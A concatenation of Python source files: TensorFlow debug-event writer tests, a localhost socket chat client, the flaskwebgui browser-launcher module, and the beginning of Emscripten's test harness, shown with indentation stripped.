stack_frame = debug_event_pb2.StackFrameWithId()
stack_frame.id = "stack_%d" % i
stack_frame.file_line_col.file_index = i * 10
writer.WriteStackFrameWithId(stack_frame)
writer.FlushNonExecutionFiles()
with debug_events_reader.DebugEventsReader(self.dump_root) as reader:
actuals = list(item.debug_event.source_file
for item in reader.source_files_iterator())
self.assertLen(actuals, num_protos)
for i in range(num_protos):
self.assertEqual(actuals[i].file_path, "/home/tf2user/main.py")
self.assertEqual(actuals[i].host_name, "machine.cluster")
self.assertEqual(actuals[i].lines, ["print(%d)" % i])
actuals = list(item.debug_event.stack_frame_with_id
for item in reader.stack_frames_iterator())
self.assertLen(actuals, num_protos)
for i in range(num_protos):
self.assertEqual(actuals[i].id, "stack_%d" % i)
self.assertEqual(actuals[i].file_line_col.file_index, i * 10)
def testWriteGraphOpCreationAndDebuggedGraphs(self):
writer = debug_events_writer.DebugEventsWriter(self.dump_root)
num_op_creations = 10
for i in range(num_op_creations):
graph_op_creation = debug_event_pb2.GraphOpCreation()
graph_op_creation.op_type = "Conv2D"
graph_op_creation.op_name = "Conv2D_%d" % i
writer.WriteGraphOpCreation(graph_op_creation)
debugged_graph = debug_event_pb2.DebuggedGraph()
debugged_graph.graph_id = "deadbeaf"
debugged_graph.graph_name = "MyGraph1"
writer.WriteDebuggedGraph(debugged_graph)
writer.FlushNonExecutionFiles()
reader = debug_events_reader.DebugEventsReader(self.dump_root)
actuals = list(item.debug_event for item in reader.graphs_iterator())
self.assertLen(actuals, num_op_creations + 1)
for i in range(num_op_creations):
self.assertEqual(actuals[i].graph_op_creation.op_type, "Conv2D")
self.assertEqual(actuals[i].graph_op_creation.op_name, "Conv2D_%d" % i)
self.assertEqual(actuals[num_op_creations].debugged_graph.graph_id,
"deadbeaf")
def testConcurrentWritesToNonExecutionFilesWorks(self):
writer = debug_events_writer.DebugEventsWriter(self.dump_root)
source_file_state = {"counter": 0, "lock": threading.Lock()}
def WriteSourceFile():
source_file = debug_event_pb2.SourceFile()
with source_file_state["lock"]:
source_file.file_path = "/home/tf2user/file_%d.py" % source_file_state[
"counter"]
source_file_state["counter"] += 1
writer.WriteSourceFile(source_file)
# More-frequent-than-necessary concurrent flushing is not recommended,
# but tolerated.
writer.FlushNonExecutionFiles()
stack_frame_state = {"counter": 0, "lock": threading.Lock()}
def WriteStackFrame():
stack_frame = debug_event_pb2.StackFrameWithId()
with stack_frame_state["lock"]:
stack_frame.id = "stack_frame_%d" % stack_frame_state["counter"]
stack_frame_state["counter"] += 1
writer.WriteStackFrameWithId(stack_frame)
# More-frequent-than-necessary concurrent flushing is not recommended,
# but tolerated.
writer.FlushNonExecutionFiles()
graph_op_state = {"counter": 0, "lock": threading.Lock()}
def WriteGraphOpCreation():
graph_op_creation = debug_event_pb2.GraphOpCreation()
with graph_op_state["lock"]:
graph_op_creation.op_name = "Op%d" % graph_op_state["counter"]
graph_op_state["counter"] += 1
writer.WriteGraphOpCreation(graph_op_creation)
# More-frequent-than-necessary concurrent flushing is not recommended,
# but tolerated.
writer.FlushNonExecutionFiles()
num_threads = 9
threads = []
for i in range(num_threads):
if i % 3 == 0:
target = WriteSourceFile
elif i % 3 == 1:
target = WriteStackFrame
else:
target = WriteGraphOpCreation
thread = threading.Thread(target=target)
thread.start()
threads.append(thread)
for thread in threads:
thread.join()
# Verify the content of the .source_files file.
with debug_events_reader.DebugEventsReader(self.dump_root) as reader:
source_files_iter = reader.source_files_iterator()
actuals = list(item.debug_event.source_file for item in source_files_iter)
file_paths = sorted([actual.file_path for actual in actuals])
self.assertEqual(file_paths, [
"/home/tf2user/file_0.py", "/home/tf2user/file_1.py",
"/home/tf2user/file_2.py"
])
# Verify the content of the .stack_frames file.
actuals = list(item.debug_event.stack_frame_with_id
for item in reader.stack_frames_iterator())
stack_frame_ids = sorted([actual.id for actual in actuals])
self.assertEqual(stack_frame_ids,
["stack_frame_0", "stack_frame_1", "stack_frame_2"])
# Verify the content of the .graphs file.
actuals = list(item.debug_event.graph_op_creation
for item in reader.graphs_iterator())
graph_op_names = sorted([actual.op_name for actual in actuals])
self.assertEqual(graph_op_names, ["Op0", "Op1", "Op2"])
def testWriteAndReadMetadata(self):
t0 = time.time()
writer = debug_events_writer.DebugEventsWriter(self.dump_root)
writer.Close()
with debug_events_reader.DebugDataReader(self.dump_root) as reader:
self.assertIsInstance(reader.starting_wall_time(), float)
self.assertGreaterEqual(reader.starting_wall_time(), t0)
self.assertEqual(reader.tensorflow_version(), versions.__version__)
def testWriteExecutionEventsWithCircularBuffer(self):
writer = debug_events_writer.DebugEventsWriter(self.dump_root)
num_execution_events = debug_events_writer.DEFAULT_CIRCULAR_BUFFER_SIZE * 2
for i in range(num_execution_events):
execution = debug_event_pb2.Execution()
execution.op_type = "OpType%d" % i
writer.WriteExecution(execution)
with debug_events_reader.DebugDataReader(self.dump_root) as reader:
# Before FlushExecutionFiles() is called. No data should have been written
# to the file.
reader.update()
self.assertFalse(reader.executions())
writer.FlushExecutionFiles()
reader.update()
executions = reader.executions()
for i, execution in enumerate(executions):
self.assertEqual(
execution.op_type,
"OpType%d" % (i + debug_events_writer.DEFAULT_CIRCULAR_BUFFER_SIZE))
def testWriteExecutionEventsWithoutCircularBufferBehavior(self):
# A circular buffer size of 0 abolishes the circular buffer behavior.
writer = debug_events_writer.DebugEventsWriter(self.dump_root, 0)
num_execution_events = debug_events_writer.DEFAULT_CIRCULAR_BUFFER_SIZE * 2
for i in range(num_execution_events):
execution = debug_event_pb2.Execution()
execution.op_type = "OpType%d" % i
writer.WriteExecution(execution)
writer.FlushExecutionFiles()
with debug_events_reader.DebugDataReader(self.dump_root) as reader:
reader.update()
executions = reader.executions()
self.assertLen(executions, num_execution_events)
for i, execution in enumerate(executions):
self.assertEqual(execution.op_type, "OpType%d" % i)
def testWriteGraphExecutionTraceEventsWithCircularBuffer(self):
writer = debug_events_writer.DebugEventsWriter(self.dump_root)
num_execution_events = debug_events_writer.DEFAULT_CIRCULAR_BUFFER_SIZE * 2
for i in range(num_execution_events):
trace = debug_event_pb2.GraphExecutionTrace()
trace.op_name = "Op%d" % i
writer.WriteGraphExecutionTrace(trace)
with debug_events_reader.DebugEventsReader(self.dump_root) as reader:
actuals = list(reader.graph_execution_traces_iterator())
# Before FlushExecutionFiles() is called. No data should have been written
# to the file.
self.assertEqual(len(actuals), 0)
writer.FlushExecutionFiles()
actuals = list(item.debug_event.graph_execution_trace
for item in reader.graph_execution_traces_iterator())
self.assertLen(actuals, debug_events_writer.DEFAULT_CIRCULAR_BUFFER_SIZE)
for i in range(debug_events_writer.DEFAULT_CIRCULAR_BUFFER_SIZE):
self.assertEqual(
actuals[i].op_name,
"Op%d" % (i + debug_events_writer.DEFAULT_CIRCULAR_BUFFER_SIZE))
def testWriteGraphExecutionTraceEventsWithoutCircularBufferBehavior(self):
# A circular buffer size of 0 abolishes the circular buffer behavior.
writer = debug_events_writer.DebugEventsWriter(self.dump_root, 0)
num_execution_events = debug_events_writer.DEFAULT_CIRCULAR_BUFFER_SIZE * 2
for i in range(num_execution_events):
trace = debug_event_pb2.GraphExecutionTrace()
trace.op_name = "Op%d" % i
writer.WriteGraphExecutionTrace(trace)
writer.FlushExecutionFiles()
with debug_events_reader.DebugEventsReader(self.dump_root) as reader:
actuals = list(item.debug_event.graph_execution_trace
for item in reader.graph_execution_traces_iterator())
self.assertLen(actuals, num_execution_events)
for i in range(num_execution_events):
self.assertEqual(actuals[i].op_name, "Op%d" % i)
def testConcurrentWritesToExecutionFiles(self):
circular_buffer_size = 5
writer = debug_events_writer.DebugEventsWriter(self.dump_root,
circular_buffer_size)
debugged_graph = debug_event_pb2.DebuggedGraph(graph_id="graph1",
graph_name="graph1")
writer.WriteDebuggedGraph(debugged_graph)
execution_state = {"counter": 0, "lock": threading.Lock()}
def WriteExecution():
execution = debug_event_pb2.Execution()
with execution_state["lock"]:
execution.op_type = "OpType%d" % execution_state["counter"]
execution_state["counter"] += 1
writer.WriteExecution(execution)
graph_execution_trace_state = {"counter": 0, "lock": threading.Lock()}
def WriteGraphExecutionTrace():
with graph_execution_trace_state["lock"]:
op_name = "Op%d" % graph_execution_trace_state["counter"]
graph_op_creation = debug_event_pb2.GraphOpCreation(
op_type="FooOp", op_name=op_name, graph_id="graph1")
trace = debug_event_pb2.GraphExecutionTrace(
op_name=op_name, tfdbg_context_id="graph1")
graph_execution_trace_state["counter"] += 1
writer.WriteGraphOpCreation(graph_op_creation)
writer.WriteGraphExecutionTrace(trace)
threads = []
for i in range(circular_buffer_size * 4):
if i % 2 == 0:
target = WriteExecution
else:
target = WriteGraphExecutionTrace
thread = threading.Thread(target=target)
thread.start()
threads.append(thread)
for thread in threads:
thread.join()
writer.FlushNonExecutionFiles()
writer.FlushExecutionFiles()
with debug_events_reader.DebugDataReader(self.dump_root) as reader:
reader.update()
# Verify the content of the .execution file.
executions = reader.executions()
executed_op_types = [execution.op_type for execution in executions]
self.assertLen(executed_op_types, circular_buffer_size)
self.assertLen(executed_op_types, len(set(executed_op_types)))
# Verify the content of the .graph_execution_traces file.
op_names = [trace.op_name for trace in reader.graph_execution_traces()]
self.assertLen(op_names, circular_buffer_size)
self.assertLen(op_names, len(set(op_names)))
if __name__ == "__main__":
ops.enable_eager_execution()
googletest.main()
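# Illustrative sketch (not TensorFlow code): the circular-buffer retention
# behavior exercised by the tests above. With a finite buffer only the last N
# events survive a flush; a buffer size of 0 disables the buffer and keeps
# every event.
def _example_circular_buffer(events, buffer_size):
    from collections import deque
    if buffer_size == 0:
        return list(events)              # no circular buffer: keep every event
    buf = deque(maxlen=buffer_size)      # circular buffer: old events fall off the front
    for event in events:
        buf.append(event)
    return list(buf)

# _example_circular_buffer(range(2000), 1000) keeps only events 1000..1999,
# mirroring testWriteExecutionEventsWithCircularBuffer above.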
|
__init__.py
|
import json
import sys
import socket
import threading
import time
from select import select
import sys
is_py2 = sys.version[0] == '2'
def main():
"""
Starts socket connection, sending and receiving threads
"""
msg_socket = socket.socket()
args = sys.argv
msg_socket.connect(('127.0.0.1', int(args[1])))
run_event = threading.Event()
receiving = threading.Thread(target = in_thread, args = (msg_socket, run_event))
sending = threading.Thread(target = out_thread, args = (msg_socket, run_event))
receiving.start()
sending.start()
print("threads started")
def in_thread(msg_socket, run_event):
"""
In thread for incoming messages
"""
while (not run_event.is_set()):
in_message = msg_socket.recv(1024).decode('utf-8')
if in_message is not None:
print(in_message)
if len(in_message) == 0:
end_processes(msg_socket, run_event)
time.sleep(0.5)
print("in_thread closed")
def out_thread(msg_socket, run_event):
"""
Out thread for sending messages
"""
while (not run_event.is_set()):
timeout = 10
try:
rlist, _, _ = select([sys.stdin], [], [], timeout)
if rlist:
message = sys.stdin.readline()
if len(message) > 0 and message is not None:
data = {'message': message, 'message_id': 1}
print("sending " + message)
msg_socket.send(json.dumps(data).encode('utf-8'))
else:
continue
except KeyboardInterrupt:
end_processes(msg_socket, run_event)
return True
print("out_thread closed")
def end_processes(msg_socket, run_event):
"""
Shuts down socket connection, end threads
"""
print("shutting down..")
run_event.set()
msg_socket.shutdown(socket.SHUT_RDWR)
print("socket shutted down")
return []
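# Illustrative counterpart (not part of this module): a minimal local echo
# server this client could be pointed at for manual testing. The port value is
# an arbitrary example; pass the same number to the client as sys.argv[1].
def _example_echo_server(port=5005):
    import socket
    srv = socket.socket()
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(('127.0.0.1', port))
    srv.listen(1)
    conn, _ = srv.accept()
    while True:
        data = conn.recv(1024)
        if not data:               # empty read means the client closed the connection
            break
        conn.send(data)            # the client's in_thread prints whatever comes back
    conn.close()
    srv.close()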
|
flaskwebgui.py
|
from http.server import BaseHTTPRequestHandler, HTTPServer
import os, time, signal
import sys, subprocess as sps
import logging
import tempfile
from threading import Thread
from datetime import datetime
temp_dir = tempfile.TemporaryDirectory()
keepalive_file = os.path.join(temp_dir.name, 'bo.txt')
server_log = logging.getLogger('BaseHTTPRequestHandler')
log = logging.getLogger('flaskwebgui')
class S(BaseHTTPRequestHandler):
def log_message(self, format, *args):
'''
Overrides logging in server.py so it doesn't spit out GET requests to stdout.
This allows the caller to filter out what appears on the console.
'''
server_log.debug(f"{self.address_string()} - {format % args}")
def _set_response(self):
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
def do_GET(self):
self._set_response()
self.wfile.write("GET request for {}".format(self.path).encode('utf-8'))
with open(keepalive_file, "w") as f:
f.write(f"{datetime.now()}")
class FlaskUI:
"""
This class starts three threads: one for the browser, one for the Flask server, and one which closes the server if the GUI is not opened
Described Parameters:
app, ==> flask class instance
width=800 ==> default width 800
height=600 ==> default height 600
fullscreen=False, ==> start app in fullscreen mode
maximized=False, ==> start app in maximized window
app_mode=True ==> by default it will start the application in chrome app mode
browser_path="", ==> full path to browser.exe ("C:/browser_folder/chrome.exe")
(needed if you want to start a specific browser)
server="flask" ==> the default backend framework is flask, but you can add a function which starts
the desired server for your chosen framework (Django, Bottle, web2py, Pyramid, etc.)
host="localhost" ==> specify other if needed
port=5000 ==> specify other if needed
socketio ==> specify flask-socketio instance if you are using flask with socketio
on_exit ==> specify on-exit function which will be run before closing the app
"""
def __init__(self, app=None, width=800, height=600, fullscreen=False, maximized=False, app_mode=True, browser_path="", server="flask", host="127.0.0.1", port=5000, socketio=None, on_exit=None):
self.flask_app = app
self.width = str(width)
self.height= str(height)
self.fullscreen = fullscreen
self.maximized = maximized
self.app_mode = app_mode
self.browser_path = browser_path if browser_path else self.get_default_chrome_path()
self.server = server
self.host = host
self.port = port
self.socketio = socketio
self.on_exit = on_exit
self.localhost = "http://{}:{}/".format(host, port) # http://127.0.0.1:5000/
self.flask_thread = Thread(target=self.run_flask) #daemon doesn't work...
self.browser_thread = Thread(target=self.open_browser)
self.close_server_thread = Thread(target=self.close_server)
self.BROWSER_PROCESS = None
def run(self):
"""
Start the flask and gui threads instantiated in the constructor func
"""
self.flask_thread.start()
self.browser_thread.start()
self.close_server_thread.start()
self.browser_thread.join()
self.flask_thread.join()
self.close_server_thread.join()
def run_flask(self):
"""
Run flask or other framework specified
"""
if isinstance(self.server, str):
if self.server.lower() == "flask":
if self.socketio:
self.socketio.run(self.flask_app, host=self.host, port=self.port)
else:
self.flask_app.run(host=self.host, port=self.port)
elif self.server.lower() == "django":
if sys.platform in ['win32', 'win64']:
os.system("python manage.py runserver {}:{}".format(self.host, self.port))
else:
os.system("python3 manage.py runserver {}:{}".format(self.host, self.port))
else:
raise Exception("{} must be a function which starts the webframework server!".format(self.server))
else:
self.server()
def get_default_chrome_path(self):
"""
Credits for get_instance_path, find_chrome_mac, find_chrome_linux, find_chrome_win funcs
got from: https://github.com/ChrisKnott/Eel/blob/master/eel/chrome.py
"""
if sys.platform in ['win32', 'win64']:
return self.find_chrome_win()
elif sys.platform == 'darwin':
return self.find_chrome_mac()
elif sys.platform.startswith('linux'):
return self.find_chrome_linux()
def find_chrome_mac(self):
default_dir = r'/Applications/Google Chrome.app/Contents/MacOS/Google Chrome'
if os.path.exists(default_dir):
return default_dir
# use mdfind ci to locate Chrome in alternate locations and return the first one
name = 'Google Chrome.app'
alternate_dirs = [x for x in sps.check_output(["mdfind", name]).decode().split('\n') if x.endswith(name)]
if len(alternate_dirs):
return alternate_dirs[0] + '/Contents/MacOS/Google Chrome'
return None
def find_chrome_linux(self):
try:
import whichcraft as wch
except:
raise Exception("whichcraft module is not installed/found \
please fill browser_path parameter or install whichcraft!")
chrome_names = ['chromium-browser',
'chromium',
'google-chrome',
'google-chrome-stable']
for name in chrome_names:
chrome = wch.which(name)
if chrome is not None:
return chrome
return None
def find_chrome_win(self):
import winreg as reg
reg_path = r'SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\chrome.exe'
chrome_path = None
for install_type in reg.HKEY_CURRENT_USER, reg.HKEY_LOCAL_MACHINE:
try:
reg_key = reg.OpenKey(install_type, reg_path, 0, reg.KEY_READ)
chrome_path = reg.QueryValue(reg_key, None)
reg_key.Close()
except WindowsError as e:
chrome_path = None
log.exception(e)
else:
if chrome_path and len(chrome_path) > 0:
break
log.debug(f"Chrome path detected as: {chrome_path}")
return chrome_path
def open_browser(self):
"""
Open the browser selected (by default it looks for chrome)
"""
if self.app_mode:
launch_options = None
if self.fullscreen:
launch_options = ["--start-fullscreen"]
elif self.maximized:
launch_options = ["--start-maximized"]
else:
launch_options = ["--window-size={},{}".format(self.width, self.height)]
options = [self.browser_path, "--new-window", '--app={}'.format(self.localhost)]
options.extend(launch_options)
log.debug(f"Opening chrome browser with: {options}")
self.BROWSER_PROCESS = sps.Popen(options,
stdout=sps.PIPE, stderr=sps.PIPE, stdin=sps.PIPE)
else:
import webbrowser
log.debug(f"Opening python web browser")
webbrowser.open_new(self.localhost)
def close_server(self):
"""
If no get request comes from browser on port + 1
then after 10 seconds the server will be closed
"""
httpd = HTTPServer(('', self.port+1), S)
httpd.timeout = 10
while True:
httpd.handle_request()
log.debug("Checking Gui status")
if os.path.isfile(keepalive_file):
with open(keepalive_file, "r") as f:
bo = f.read().splitlines()[0]
diff = datetime.now() - datetime.strptime(bo, "%Y-%m-%d %H:%M:%S.%f")
if diff.total_seconds() > 10:
log.info("Gui was closed.")
break
log.debug("Gui still open.")
time.sleep(2)
if self.on_exit:
self.on_exit()
#Kill current python process
if os.path.isfile(keepalive_file):
# bo.txt stores the timestamp used to check whether the browser is still open
os.remove(keepalive_file)
try:
import psutil
psutil.Process(os.getpid()).kill()
except:
os.kill(os.getpid(), signal.SIGSTOP)
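# Illustrative usage sketch (not part of this module): a minimal Flask app
# wired through FlaskUI, following the parameters documented in the class
# docstring. The route and window size are arbitrary examples; Flask is
# assumed to be installed.
def _example_flaskui_usage():
    from flask import Flask

    app = Flask(__name__)

    @app.route('/')
    def index():
        return 'Hello from FlaskUI'

    # Starts the Flask server, opens the browser in app mode, and shuts the
    # server down once the GUI window stops sending keep-alive requests.
    FlaskUI(app=app, width=600, height=400).run()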
|
common.py
|
# Copyright 2021 The Emscripten Authors. All rights reserved.
# Emscripten is available under two separate licenses, the MIT license and the
# University of Illinois/NCSA Open Source License. Both these licenses can be
# found in the LICENSE file.
from enum import Enum
from functools import wraps
from pathlib import Path
from subprocess import PIPE, STDOUT
from urllib.parse import unquote, unquote_plus
from http.server import HTTPServer, SimpleHTTPRequestHandler
import contextlib
import difflib
import hashlib
import logging
import multiprocessing
import os
import shlex
import shutil
import stat
import string
import subprocess
import sys
import tempfile
import time
import webbrowser
import unittest
import clang_native
import jsrun
from tools.shared import TEMP_DIR, EMCC, EMXX, DEBUG, EMCONFIGURE, EMCMAKE
from tools.shared import EMSCRIPTEN_TEMP_DIR
from tools.shared import EM_BUILD_VERBOSE
from tools.shared import get_canonical_temp_dir, try_delete, path_from_root
from tools.utils import MACOS, WINDOWS, read_file, read_binary, write_file, write_binary
from tools import shared, line_endings, building, config
logger = logging.getLogger('common')
# User can specify an environment variable EMTEST_BROWSER to force the browser
# test suite to run using a browser command line other than the default system
# browser. Setting '0' as the browser disables running a browser (but we still
# check that the tests compile)
EMTEST_BROWSER = None
EMTEST_DETECT_TEMPFILE_LEAKS = None
EMTEST_SAVE_DIR = None
# Generally JS engines are equivalent, so testing one is enough. Set this
# to force testing on all JS engines; good for finding JS engine bugs.
EMTEST_ALL_ENGINES = None
EMTEST_SKIP_SLOW = None
EMTEST_LACKS_NATIVE_CLANG = None
EMTEST_VERBOSE = None
EMTEST_REBASELINE = None
# Special value for passing to assert_returncode which means we expect that program
# to fail with non-zero return code, but we don't care about specifically which one.
NON_ZERO = -1
TEST_ROOT = path_from_root('tests')
WEBIDL_BINDER = shared.bat_suffix(path_from_root('tools/webidl_binder'))
EMBUILDER = shared.bat_suffix(path_from_root('embuilder'))
EMMAKE = shared.bat_suffix(path_from_root('emmake'))
def delete_contents(pathname):
for entry in os.listdir(pathname):
try_delete(os.path.join(pathname, entry))
def test_file(*path_components):
"""Construct a path relative to the emscripten "tests" directory."""
return str(Path(TEST_ROOT, *path_components))
# checks if browser testing is enabled
def has_browser():
return EMTEST_BROWSER != '0'
def compiler_for(filename, force_c=False):
if shared.suffix(filename) in ('.cc', '.cxx', '.cpp') and not force_c:
return EMXX
else:
return EMCC
# Generic decorator that calls a function named 'condition' on the test class and
# skips the test if that function returns true
def skip_if(func, condition, explanation='', negate=False):
assert callable(func)
explanation_str = ' : %s' % explanation if explanation else ''
@wraps(func)
def decorated(self, *args, **kwargs):
choice = self.__getattribute__(condition)()
if negate:
choice = not choice
if choice:
self.skipTest(condition + explanation_str)
func(self, *args, **kwargs)
return decorated
def needs_dylink(func):
assert callable(func)
@wraps(func)
def decorated(self, *args, **kwargs):
self.check_dylink()
return func(self, *args, **kwargs)
return decorated
def is_slow_test(func):
assert callable(func)
@wraps(func)
def decorated(self, *args, **kwargs):
if EMTEST_SKIP_SLOW:
return self.skipTest('skipping slow tests')
return func(self, *args, **kwargs)
return decorated
def disabled(note=''):
assert not callable(note)
return unittest.skip(note)
def no_mac(note=''):
assert not callable(note)
if MACOS:
return unittest.skip(note)
return lambda f: f
def no_windows(note=''):
assert not callable(note)
if WINDOWS:
return unittest.skip(note)
return lambda f: f
def requires_native_clang(func):
assert callable(func)
def decorated(self, *args, **kwargs):
if EMTEST_LACKS_NATIVE_CLANG:
return self.skipTest('native clang tests are disabled')
return func(self, *args, **kwargs)
return decorated
def require_node(func):
assert callable(func)
def decorated(self, *args, **kwargs):
self.require_node()
return func(self, *args, **kwargs)
return decorated
def require_v8(func):
assert callable(func)
def decorated(self, *args, **kwargs):
self.require_v8()
return func(self, *args, **kwargs)
return decorated
def node_pthreads(f):
def decorated(self, *args, **kwargs):
self.set_setting('USE_PTHREADS')
self.emcc_args += ['-Wno-pthreads-mem-growth']
if self.get_setting('MINIMAL_RUNTIME'):
self.skipTest('node pthreads not yet supported with MINIMAL_RUNTIME')
self.js_engines = [config.NODE_JS]
self.node_args += ['--experimental-wasm-threads', '--experimental-wasm-bulk-memory']
f(self, *args, **kwargs)
return decorated
@contextlib.contextmanager
def env_modify(updates):
"""A context manager that updates os.environ."""
# This could also be done with mock.patch.dict() but taking a dependency
# on the mock library is probably not worth the benefit.
old_env = os.environ.copy()
print("env_modify: " + str(updates))
# Setting a value to None clears the environment variable
clears = [key for key, value in updates.items() if value is None]
updates = {key: value for key, value in updates.items() if value is not None}
os.environ.update(updates)
for key in clears:
if key in os.environ:
del os.environ[key]
try:
yield
finally:
os.environ.clear()
os.environ.update(old_env)
# Decorator version of env_modify
def with_env_modify(updates):
def decorated(f):
def modified(self):
with env_modify(updates):
return f(self)
return modified
return decorated
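# Illustrative usage sketch (not part of the test harness): env_modify as a
# context manager and with_env_modify as a decorator. The variable names are
# arbitrary examples, and None clears a variable as noted above.
def _example_env_modify_usage():
    # Set EMCC_DEBUG for the duration of the block and clear EMCC_CORES; the
    # original environment is restored on exit, even if the body raises.
    with env_modify({'EMCC_DEBUG': '1', 'EMCC_CORES': None}):
        pass  # run a compile or a subprocess here

# The decorator form applies the same changes around a whole test method:
# @with_env_modify({'EMCC_DEBUG': '1'})
# def test_something(self):
#     ...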
def ensure_dir(dirname):
dirname = Path(dirname)
dirname.mkdir(parents=True, exist_ok=True)
def limit_size(string, maxbytes=800000 * 20, maxlines=100000, max_line=5000):
lines = string.splitlines()
for i, line in enumerate(lines):
if len(line) > max_line:
lines[i] = line[:max_line] + '[..]'
if len(lines) > maxlines:
lines = lines[0:maxlines // 2] + ['[..]'] + lines[-maxlines // 2:]
string = '\n'.join(lines) + '\n'
if len(string) > maxbytes:
string = string[0:maxbytes // 2] + '\n[..]\n' + string[-maxbytes // 2:]
return string
def create_file(name, contents, binary=False):
name = Path(name)
assert not name.is_absolute()
if binary:
name.write_bytes(contents)
else:
name.write_text(contents)
def make_executable(name):
Path(name).chmod(stat.S_IREAD | stat.S_IWRITE | stat.S_IEXEC)
def parameterized(parameters):
"""
Mark a test as parameterized.
Usage:
@parameterized({
'subtest1': (1, 2, 3),
'subtest2': (4, 5, 6),
})
def test_something(self, a, b, c):
... # actual test body
This is equivalent to defining two tests:
def test_something_subtest1(self):
# runs test_something(1, 2, 3)
def test_something_subtest2(self):
# runs test_something(4, 5, 6)
"""
def decorator(func):
func._parameterize = parameters
return func
return decorator
class RunnerMeta(type):
@classmethod
def make_test(mcs, name, func, suffix, args):
"""
This is a helper function to create new test functions for each parameterized form.
:param name: the original name of the function
:param func: the original function that we are parameterizing
:param suffix: the suffix to append to the name of the function for this parameterization
:param args: the positional arguments to pass to the original function for this parameterization
:returns: a tuple of (new_function_name, new_function_object)
"""
# Create the new test function. It calls the original function with the specified args.
# We use @functools.wraps to copy over all the function attributes.
@wraps(func)
def resulting_test(self):
return func(self, *args)
# Add suffix to the function name so that it displays correctly.
if suffix:
resulting_test.__name__ = f'{name}_{suffix}'
else:
resulting_test.__name__ = name
# On python 3, functions have __qualname__ as well. This is a full dot-separated path to the
# function. We add the suffix to it as well.
resulting_test.__qualname__ = f'{func.__qualname__}_{suffix}'
return resulting_test.__name__, resulting_test
def __new__(mcs, name, bases, attrs):
# This metaclass expands parameterized methods from `attrs` into separate ones in `new_attrs`.
new_attrs = {}
for attr_name, value in attrs.items():
# Check if a member of the new class has _parameterize, the tag inserted by @parameterized.
if hasattr(value, '_parameterize'):
# If it does, we extract the parameterization information, build new test functions.
for suffix, args in value._parameterize.items():
new_name, func = mcs.make_test(attr_name, value, suffix, args)
assert new_name not in new_attrs, 'Duplicate attribute name generated when parameterizing %s' % attr_name
new_attrs[new_name] = func
else:
# If not, we just copy it over to new_attrs verbatim.
assert attr_name not in new_attrs, '%s collided with an attribute from parameterization' % attr_name
new_attrs[attr_name] = value
# We invoke type, the default metaclass, to actually create the new class, with new_attrs.
return type.__new__(mcs, name, bases, new_attrs)
class RunnerCore(unittest.TestCase, metaclass=RunnerMeta):
# default temporary directory settings. set_temp_dir may be called later to
# override these
temp_dir = TEMP_DIR
canonical_temp_dir = get_canonical_temp_dir(TEMP_DIR)
# This avoids cluttering the test runner output, which also goes to stderr, with compiler warnings etc.
# Change this to None to get stderr reporting, for debugging purposes
stderr_redirect = STDOUT
def is_wasm(self):
return self.get_setting('WASM') != 0
def check_dylink(self):
if self.get_setting('ALLOW_MEMORY_GROWTH') == 1 and not self.is_wasm():
self.skipTest('no dynamic linking with memory growth (without wasm)')
if not self.is_wasm():
self.skipTest('no dynamic linking support in wasm2js yet')
if '-fsanitize=address' in self.emcc_args:
self.skipTest('no dynamic linking support in ASan yet')
if '-fsanitize=leak' in self.emcc_args:
self.skipTest('no dynamic linking support in LSan yet')
def require_v8(self):
if not config.V8_ENGINE or config.V8_ENGINE not in config.JS_ENGINES:
if 'EMTEST_SKIP_V8' in os.environ:
self.skipTest('test requires v8 and EMTEST_SKIP_V8 is set')
else:
self.fail('d8 required to run this test. Use EMTEST_SKIP_V8 to skip')
self.js_engines = [config.V8_ENGINE]
self.emcc_args.append('-sENVIRONMENT=shell')
def require_node(self):
if not config.NODE_JS or config.NODE_JS not in config.JS_ENGINES:
if 'EMTEST_SKIP_NODE' in os.environ:
self.skipTest('test requires node and EMTEST_SKIP_NODE is set')
else:
self.fail('node required to run this test. Use EMTEST_SKIP_NODE to skip')
self.js_engines = [config.NODE_JS]
def uses_memory_init_file(self):
if self.get_setting('SIDE_MODULE') or (self.is_wasm() and not self.get_setting('WASM2JS')):
return False
elif '--memory-init-file' in self.emcc_args:
return int(self.emcc_args[self.emcc_args.index('--memory-init-file') + 1])
else:
# side modules handle memory differently; binaryen puts the memory in the wasm module
opt_supports = any(opt in self.emcc_args for opt in ('-O2', '-O3', '-Os', '-Oz'))
return opt_supports
def set_temp_dir(self, temp_dir):
self.temp_dir = temp_dir
self.canonical_temp_dir = get_canonical_temp_dir(self.temp_dir)
# Explicitly set dedicated temporary directory for parallel tests
os.environ['EMCC_TEMP_DIR'] = self.temp_dir
@classmethod
def setUpClass(cls):
super().setUpClass()
print('(checking sanity from test runner)') # do this after we set env stuff
shared.check_sanity(force=True)
def setUp(self):
super().setUp()
self.settings_mods = {}
self.emcc_args = ['-Werror']
self.node_args = [
# Increase stack trace limit to maximise usefulness of test failure reports
'--stack-trace-limit=50',
# Opt in to node v15 default behaviour:
# https://nodejs.org/api/cli.html#cli_unhandled_rejections_mode
'--unhandled-rejections=throw',
# Include backtrace for all uncaught exceptions (not just Error).
'--trace-uncaught',
]
self.v8_args = []
self.env = {}
self.temp_files_before_run = []
self.uses_es6 = False
self.js_engines = config.JS_ENGINES.copy()
self.wasm_engines = config.WASM_ENGINES.copy()
self.banned_js_engines = []
self.use_all_engines = EMTEST_ALL_ENGINES
if EMTEST_DETECT_TEMPFILE_LEAKS:
for root, dirnames, filenames in os.walk(self.temp_dir):
for dirname in dirnames:
self.temp_files_before_run.append(os.path.normpath(os.path.join(root, dirname)))
for filename in filenames:
self.temp_files_before_run.append(os.path.normpath(os.path.join(root, filename)))
if EMTEST_SAVE_DIR:
self.working_dir = os.path.join(self.temp_dir, 'emscripten_test')
if os.path.exists(self.working_dir):
if EMTEST_SAVE_DIR == 2:
print('Not clearing existing test directory')
else:
print('Clearing existing test directory')
# Even when EMTEST_SAVE_DIR is set, we still try to start with an empty directory, as many tests
# expect this. EMTEST_SAVE_DIR=2 can be used to keep the old contents for the new test
# run. This can be useful when iterating on a given test with extra files you want to keep
# around in the output directory.
delete_contents(self.working_dir)
else:
print('Creating new test output directory')
ensure_dir(self.working_dir)
else:
self.working_dir = tempfile.mkdtemp(prefix='emscripten_test_' + self.__class__.__name__ + '_', dir=self.temp_dir)
os.chdir(self.working_dir)
if not EMTEST_SAVE_DIR:
self.has_prev_ll = False
for temp_file in os.listdir(TEMP_DIR):
